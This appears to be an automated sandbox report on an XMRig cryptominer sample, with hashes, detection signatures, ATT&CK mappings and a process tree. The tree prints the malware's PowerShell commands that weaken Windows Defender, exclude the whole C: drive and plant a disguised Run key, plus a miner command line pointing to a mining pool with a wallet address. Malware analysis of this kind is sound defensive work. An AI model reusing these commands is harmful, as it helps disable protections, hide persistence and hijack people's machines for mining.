xmrig | 9ea9441f7c4279b04044795c514dab27c1a7129dc744044207cdd4dba0859dc9

Analysis

max time kernel
152s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2022 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
Size

5.8MB
MD5

27124a76fe1a7d01090183e7eb646b0e
SHA1

9612c76890e70d63298e674601921cc3a9bbc00c
SHA256

bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776
SHA512

1e218f3b9acdc19dc9d915bbe0cf8afd4b4a0804f2a105aaf063a149cc78995a0948327b4086f6b97d35a213ae951a29e6a5bd91e5438b37585e54b8f6fbdda2
SSDEEP

98304:FuAXqhdxBaSbIzxiEXUfcZYU5XiG0Yq9VaEZns3VpUCpBx4Yfq8WwnwPNq3HZQ:0AWbNbIzxibcZYDFYXjHBq8WwC8Q

Score

10^/10

xmrig miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral10/memory/2072-159-0x0000000140000000-0x0000000140711000-memory.dmp	xmrig
behavioral10/memory/2072-162-0x0000000140000000-0x0000000140711000-memory.dmp	xmrig
behavioral10/memory/2072-164-0x0000000140000000-0x0000000140711000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
4540	WinSec.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral10/memory/2072-155-0x0000000140000000-0x0000000140711000-memory.dmp	upx
behavioral10/memory/2072-157-0x0000000140000000-0x0000000140711000-memory.dmp	upx
behavioral10/memory/2072-158-0x0000000140000000-0x0000000140711000-memory.dmp	upx
behavioral10/memory/2072-159-0x0000000140000000-0x0000000140711000-memory.dmp	upx
behavioral10/memory/2072-162-0x0000000140000000-0x0000000140711000-memory.dmp	upx
behavioral10/memory/2072-164-0x0000000140000000-0x0000000140711000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4540 set thread context of 2072	4540	WinSec.exe	92

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4760	powershell.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
632	powershell.exe
1492	powershell.exe
4760	powershell.exe
1492	powershell.exe
632	powershell.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
1260	powershell.exe
1260	powershell.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe
4540	WinSec.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
648	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4540	WinSec.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	632	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	4540	WinSec.exe
Token: SeLockMemoryPrivilege	2072	RegAsm.exe
Token: SeLockMemoryPrivilege	2072	RegAsm.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 4480 wrote to memory of 4540	4480	bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe	83
PID 4480 wrote to memory of 4540	4480	bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe	83
PID 4540 wrote to memory of 4760	4540	WinSec.exe	84
PID 4540 wrote to memory of 4760	4540	WinSec.exe	84
PID 4540 wrote to memory of 1492	4540	WinSec.exe	88
PID 4540 wrote to memory of 1492	4540	WinSec.exe	88
PID 4540 wrote to memory of 632	4540	WinSec.exe	87
PID 4540 wrote to memory of 632	4540	WinSec.exe	87
PID 4540 wrote to memory of 1260	4540	WinSec.exe	90
PID 4540 wrote to memory of 1260	4540	WinSec.exe	90
PID 4540 wrote to memory of 2072	4540	WinSec.exe	92
PID 4540 wrote to memory of 2072	4540	WinSec.exe	92
PID 4540 wrote to memory of 2072	4540	WinSec.exe	92
PID 4540 wrote to memory of 2072	4540	WinSec.exe	92
PID 4540 wrote to memory of 2072	4540	WinSec.exe	92
PID 4540 wrote to memory of 2072	4540	WinSec.exe	92
PID 4540 wrote to memory of 2072	4540	WinSec.exe	92

C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4480
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Set-MpPreference -PUAProtection 1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Add-MpPreference -ExclusionPath C:\
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1260
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

Filesize
5.7MB

MD5
a419d5d9882f43143818df7122c684a1

SHA1
63a5ae4680d40c7c87d3b5b96317a8afbf42d071

SHA256
594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7

SHA512
3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

Filesize
5.7MB

MD5
a419d5d9882f43143818df7122c684a1

SHA1
63a5ae4680d40c7c87d3b5b96317a8afbf42d071

SHA256
594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7

SHA512
3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

Download Submit
memory/632-148-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/632-143-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/1260-154-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/1492-149-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/1492-144-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/2072-162-0x0000000140000000-0x0000000140711000-memory.dmp

Filesize
7.1MB

Download
memory/2072-163-0x000002630A900000-0x000002630A940000-memory.dmp

Filesize
256KB

Download
memory/2072-165-0x000002639E540000-0x000002639E560000-memory.dmp

Filesize
128KB

Download
memory/2072-161-0x000002630A7C0000-0x000002630A7D4000-memory.dmp

Filesize
80KB

Download
memory/2072-164-0x0000000140000000-0x0000000140711000-memory.dmp

Filesize
7.1MB

Download
memory/2072-157-0x0000000140000000-0x0000000140711000-memory.dmp

Filesize
7.1MB

Download
memory/2072-159-0x0000000140000000-0x0000000140711000-memory.dmp

Filesize
7.1MB

Download
memory/2072-158-0x0000000140000000-0x0000000140711000-memory.dmp

Filesize
7.1MB

Download
memory/2072-166-0x000002639E540000-0x000002639E560000-memory.dmp

Filesize
128KB

Download
memory/2072-155-0x0000000140000000-0x0000000140711000-memory.dmp

Filesize
7.1MB

Download
memory/4540-153-0x00000195AF5C0000-0x00000195AF5D2000-memory.dmp

Filesize
72KB

Download
memory/4540-140-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/4540-135-0x00000195AD3C0000-0x00000195AD96E000-memory.dmp

Filesize
5.7MB

Download
memory/4540-160-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/4540-136-0x00000195ADE60000-0x00000195ADE6A000-memory.dmp

Filesize
40KB

Download
memory/4760-150-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/4760-142-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp

Filesize
10.8MB

Download
memory/4760-141-0x00000204EDC60000-0x00000204EDC82000-memory.dmp

Filesize
136KB

Download